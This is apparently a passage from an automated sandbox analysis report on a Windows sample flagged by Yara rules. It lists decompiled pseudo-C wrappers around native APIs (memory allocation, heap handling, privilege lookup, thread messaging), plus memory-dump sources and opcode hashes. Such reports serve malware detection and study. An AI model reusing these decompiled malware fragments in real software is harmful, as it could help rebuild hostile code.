                                                                                                  APIs
                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2167126740-0
                                                                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                  • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                  • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                                  0x004182e3
                                                                                                  0x004182e6
                                                                                                  0x004182ef
                                                                                                  0x004182f7
                                                                                                  0x00418305
                                                                                                  0x00418309

                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 3535843008-0
                                                                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                  • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                  • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 6ce0e258aa738072e7f647c51230e9201616741c23f9c2d0737f4fa7881f3263
                                                                                                  • Instruction ID: 38c60c9c5987a87ade63d86acf0ad3c52234d84a5a182d682657b57437046be7
                                                                                                  • Opcode Fuzzy Hash: 6ce0e258aa738072e7f647c51230e9201616741c23f9c2d0737f4fa7881f3263
                                                                                                  • Instruction Fuzzy Hash: C190026260100502E21171994404616044AD7D0381F91C076A102455DECAA589A2F171
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 59d7e19e3eca5daac8c048b8cf78f22be02dbb158a0acd4685114866447d0f96
                                                                                                  • Instruction ID: 33d3b366108972303e3c52bfb089dde854f3d0e071710561d69626bfdc4f1fd3
                                                                                                  • Opcode Fuzzy Hash: 59d7e19e3eca5daac8c048b8cf78f22be02dbb158a0acd4685114866447d0f96
                                                                                                  • Instruction Fuzzy Hash: 8890027220100413E221619945047070449D7D0381F91C466A042455CD96D68962F161
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: bc7148191d4a4c85a8cac427bd876d1c1ba18785299265bcf516f4a730e93b23
                                                                                                  • Instruction ID: f9270b7e0f82d6f1991b7aef2c8e4c4914d400f4d228e2201784994da99aba5e
                                                                                                  • Opcode Fuzzy Hash: bc7148191d4a4c85a8cac427bd876d1c1ba18785299265bcf516f4a730e93b23
                                                                                                  • Instruction Fuzzy Hash: 7090026224204152A655B19944045074446E7E0381791C066A1414958C85A69866E661
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: e2465bee407adce523d220016577bb21d6f48f7055d0ec5b486a879eb308ffed
                                                                                                  • Instruction ID: a49be56c60f79f66e4f4417ddec70c7bf654e831ac47f2e65f4b450003604300
                                                                                                  • Opcode Fuzzy Hash: e2465bee407adce523d220016577bb21d6f48f7055d0ec5b486a879eb308ffed
                                                                                                  • Instruction Fuzzy Hash: 8F9002A234100442E21061994414B060445D7E1341F51C069E106455CD8699CC62B166
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 769860cbb8a378638b446b86791a193f94f43d38e60c27f11ea6b958babcc5ed
                                                                                                  • Instruction ID: 53e9bd124b765e80f14eaa712b881d3c6c690ff46bca6d91d9c9a931c7c1ba39
                                                                                                  • Opcode Fuzzy Hash: 769860cbb8a378638b446b86791a193f94f43d38e60c27f11ea6b958babcc5ed
                                                                                                  • Instruction Fuzzy Hash: D99002A220200003921571994414616444AD7E0341B51C075E1014598DC5A588A1B165
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 6725ef145efd79e6a99f7c681cd2f1432383489db19a5540b36a4f3c0346ad90
                                                                                                  • Instruction ID: aee400a18e5975c5bd04f11886a138cf87def92b3cb6faa3bd63cf6596d6fe2a
                                                                                                  • Opcode Fuzzy Hash: 6725ef145efd79e6a99f7c681cd2f1432383489db19a5540b36a4f3c0346ad90
                                                                                                  • Instruction Fuzzy Hash: 5B9002B220100402E250719944047460445D7D0341F51C065A506455CE86D98DE5B6A5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: d1f53b4ba7b9d7b3038867c66f0122e005ca26360ffa9b6cc92e5a4dd0f64672
                                                                                                  • Instruction ID: a47fe44ee44b720e8bbaf41e346c382c2bf0c91f565b75253757819afc6111ea
                                                                                                  • Opcode Fuzzy Hash: d1f53b4ba7b9d7b3038867c66f0122e005ca26360ffa9b6cc92e5a4dd0f64672
                                                                                                  • Instruction Fuzzy Hash: 80900266211000035215A59907045070486D7D5391351C075F1015558CD6A18871A161
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: fd559f523f5275fc286e5b43bf21da97c4ca7295e206d7ffff02f655618a8751
                                                                                                  • Instruction ID: b39a88afcfee89752d381567343b55fa3eb99d4b6067ad06a13de3de3180f2c5
                                                                                                  • Opcode Fuzzy Hash: fd559f523f5275fc286e5b43bf21da97c4ca7295e206d7ffff02f655618a8751
                                                                                                  • Instruction Fuzzy Hash: 1490027220108802E2206199840474A0445D7D0341F55C465A442465CD86D588A1B161
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 45606073b0eb2c7beaa070f176b7c934d3fa5b3ff2f9b9d18c9f67df5a8b63b6
                                                                                                  • Instruction ID: 721f9cb85ee728b2a5c9d17bf2a08e603cc9c910fa433705a222a7d8d73de292
                                                                                                  • Opcode Fuzzy Hash: 45606073b0eb2c7beaa070f176b7c934d3fa5b3ff2f9b9d18c9f67df5a8b63b6
                                                                                                  • Instruction Fuzzy Hash: E090026260100042925071A988449064445FBE1351751C175A0998558D85D98875A6A5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 18155b5369bfdd871277294abe6f630a8946b7204f7a8c64200d22f2f3e80fbb
                                                                                                  • Instruction ID: f8dafc996cad0b1420dcb86850c8424528aa4540b361dd03382a96d5af7b2aa9
                                                                                                  • Opcode Fuzzy Hash: 18155b5369bfdd871277294abe6f630a8946b7204f7a8c64200d22f2f3e80fbb
                                                                                                  • Instruction Fuzzy Hash: 6F90027220140402E2106199481470B0445D7D0342F51C065A116455DD86A58861B5B1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 6ea121f0730567060e99a15ef92669b1358f30c93a174bb0e2fef9ae4e3e95e5
                                                                                                  • Instruction ID: 89217e3e766221b55d344b28853367cdf4ff66c9f2eed02b7efd8e73c17df286
                                                                                                  • Opcode Fuzzy Hash: 6ea121f0730567060e99a15ef92669b1358f30c93a174bb0e2fef9ae4e3e95e5
                                                                                                  • Instruction Fuzzy Hash: C790027220100802E2907199440464A0445D7D1341F91C069A002565CDCA958A69B7E1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: ed214d98f9d2b6e48766cefadb3b2f1b46dfba1c07b43fb5fa9a75bd06602ea0
                                                                                                  • Instruction ID: c31aad2699236ece3cc13049112d8348dfaa9e4ebf4db858b6c1282cf15b66a9
                                                                                                  • Opcode Fuzzy Hash: ed214d98f9d2b6e48766cefadb3b2f1b46dfba1c07b43fb5fa9a75bd06602ea0
                                                                                                  • Instruction Fuzzy Hash: 4F90026221180042E31065A94C14B070445D7D0343F51C169A015455CCC9958871A561
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 09a7a6aa45aa79aa076b1b6e84098ed5721290a436c942c6f2a0a5fd7a6ea331
                                                                                                  • Instruction ID: 1b0a651735c27ed3dccb8e1106bc2ece52c520f72a5df2fa31cc4aedb203255d
                                                                                                  • Opcode Fuzzy Hash: 09a7a6aa45aa79aa076b1b6e84098ed5721290a436c942c6f2a0a5fd7a6ea331
                                                                                                  • Instruction Fuzzy Hash: 1C90026230100003E250719954186064445E7E1341F51D065E041455CCD9958866A262
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 2b5484583c8e11abf0546e6163a48aea15437662e91a463176ea86ecbd87aac4
                                                                                                  • Instruction ID: 25d84ef502cca678b9d6221c364d5445cc460ae19c2d623ee562180b4174949b
                                                                                                  • Opcode Fuzzy Hash: 2b5484583c8e11abf0546e6163a48aea15437662e91a463176ea86ecbd87aac4
                                                                                                  • Instruction Fuzzy Hash: E290026A21300002E2907199540860A0445D7D1342F91D469A001555CCC9958879A361
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 9be0f6a5772e487741c7565a3e0711ed71eeb48b8dec782d9d854aab43c05de0
                                                                                                  • Instruction ID: dc216a90dba302d4eee3dbe0a699ba85f72e60d12f14376749cf7359fa4ac185
                                                                                                  • Opcode Fuzzy Hash: 9be0f6a5772e487741c7565a3e0711ed71eeb48b8dec782d9d854aab43c05de0
                                                                                                  • Instruction Fuzzy Hash: 0C90027231114402E220619984047060445D7D1341F51C465A082455CD86D588A1B162
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 1d1c3691f6fc03f77f66d7b53a444ad82dc1009b050545e96bbc7e52c78f39b7
                                                                                                  • Instruction ID: 1f03a23ec1a8910f98b96e5c7e67ed0ff46a3554234b994723c3a80cd6ab346f
                                                                                                  • Opcode Fuzzy Hash: 1d1c3691f6fc03f77f66d7b53a444ad82dc1009b050545e96bbc7e52c78f39b7
                                                                                                  • Instruction Fuzzy Hash: BF90027220100402E21065D954086460445D7E0341F51D065A502455DEC6E588A1B171
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004088A0, Relevance: .1, Instructions: 92COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                                                  • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                                                  • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                                                  • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00418446, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID: hA
                                                                                                  • API String ID: 1279760036-1221461045
                                                                                                  • Opcode ID: 8a42caf356b98fa34850bb707e9e6ac6e7ab7ccefacd45b7d6f322cdc3d839c0
                                                                                                  • Instruction ID: 4f3d825eea56f0d6598943f98f596a4a8ec781e2125e65a81735a9b4ecdda116
                                                                                                  • Opcode Fuzzy Hash: 8a42caf356b98fa34850bb707e9e6ac6e7ab7ccefacd45b7d6f322cdc3d839c0
                                                                                                  • Instruction Fuzzy Hash: 48018CB26002046BDB18EF98DC84DE777ACEF88310B00855EFA499B341CA35E911CBE4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 82%
                                                                                                  			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t12 = E00409B10(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                                  0x00407260
                                                                                                  0x0040726f
                                                                                                  0x00407273
                                                                                                  0x0040727e
                                                                                                  0x0040728e
                                                                                                  0x0040729e
                                                                                                  0x004072a3
                                                                                                  0x004072aa
                                                                                                  0x004072ad
                                                                                                  0x004072ba
                                                                                                  0x004072bc
                                                                                                  0x004072be
                                                                                                  0x004072db
                                                                                                  0x004072db
                                                                                                  0x00000000
                                                                                                  0x004072dd
                                                                                                  0x004072e2

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1836367815-0
                                                                                                  • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                                                  • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                                                  • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                                                  • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004184F2, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 621844428-0
                                                                                                  • Opcode ID: 878dd91fde448f6adbeec5b73caba6a01bc6935c305d8fc1347b88e012e15da3
                                                                                                  • Instruction ID: da8eea28f2eed8a5216adb3dd2a9f9122a5d02af6884edf748c089a63b56ab5d
                                                                                                  • Opcode Fuzzy Hash: 878dd91fde448f6adbeec5b73caba6a01bc6935c305d8fc1347b88e012e15da3
                                                                                                  • Instruction Fuzzy Hash: 570113B2200108BFCB14DF98CC80DEB37A9AF8C354F118258BA1D97341D630ED418BA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00418611, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 37%
                                                                                                  			E00418611(void* __eax, void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t14;
				void* _t20;

				asm("hlt");
				asm("cmc");
				asm("arpl [eax], di");
				asm("adc ah, [ebp+0x55]");
				_t11 = _a4;
				E00418DB0(_t20, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t11 + 0xa18)), 0, 0x46);
				_t14 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t14;
			}





                                                                                                  0x0041861a
                                                                                                  0x0041861b
                                                                                                  0x0041861c
                                                                                                  0x0041861e
                                                                                                  0x00418623
                                                                                                  0x0041863a
                                                                                                  0x00418650
                                                                                                  0x00418654

                                                                                                  APIs
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3899507212-0
                                                                                                  • Opcode ID: 824ca6a66ef249cccaad10279097698fa29a500877d035cfbe8693246dc63840
                                                                                                  • Instruction ID: 5f6e250d4f082792119222482a770df913c131ace216949662076a7d01997107
                                                                                                  • Opcode Fuzzy Hash: 824ca6a66ef249cccaad10279097698fa29a500877d035cfbe8693246dc63840
                                                                                                  • Instruction Fuzzy Hash: 5BF0A0752002046FCB10EF54D845ED737A8AF8A340F028058FE4817242DA34AC25CBF5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004184B2, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 64%
                                                                                                  			E004184B2(void* __eax, void* __edx, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t13;
				void* _t20;

				_push(0x2f);
				asm("movsb");
				_t10 = _v0;
				_t4 = _t10 + 0xc74; // 0xc74
				E00418DB0(_t20, _v0, _t4,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t13;
			}






                                                                                                  0x004184b7
                                                                                                  0x004184ba
                                                                                                  0x004184c3
                                                                                                  0x004184cf
                                                                                                  0x004184d7
                                                                                                  0x004184ed
                                                                                                  0x004184f1

                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
                                                                                                  • Opcode ID: 58235990c20f4b1a83f39d9474105fa5a863163e9a67e2de78f26a2c61d2651b
                                                                                                  • Instruction ID: 2ef2388b3282c25476fcb6ea17db52d36279a1a791306a8d8af3171220f45101
                                                                                                  • Opcode Fuzzy Hash: 58235990c20f4b1a83f39d9474105fa5a863163e9a67e2de78f26a2c61d2651b
                                                                                                  • Instruction Fuzzy Hash: C4E06DB66402016FD714EF54DC49FE77B69EF88350F014599B9189B291D631E901CAB0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                  0x004184cf
                                                                                                  0x004184d7
                                                                                                  0x004184ed
                                                                                                  0x004184f1

                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
                                                                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                  • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
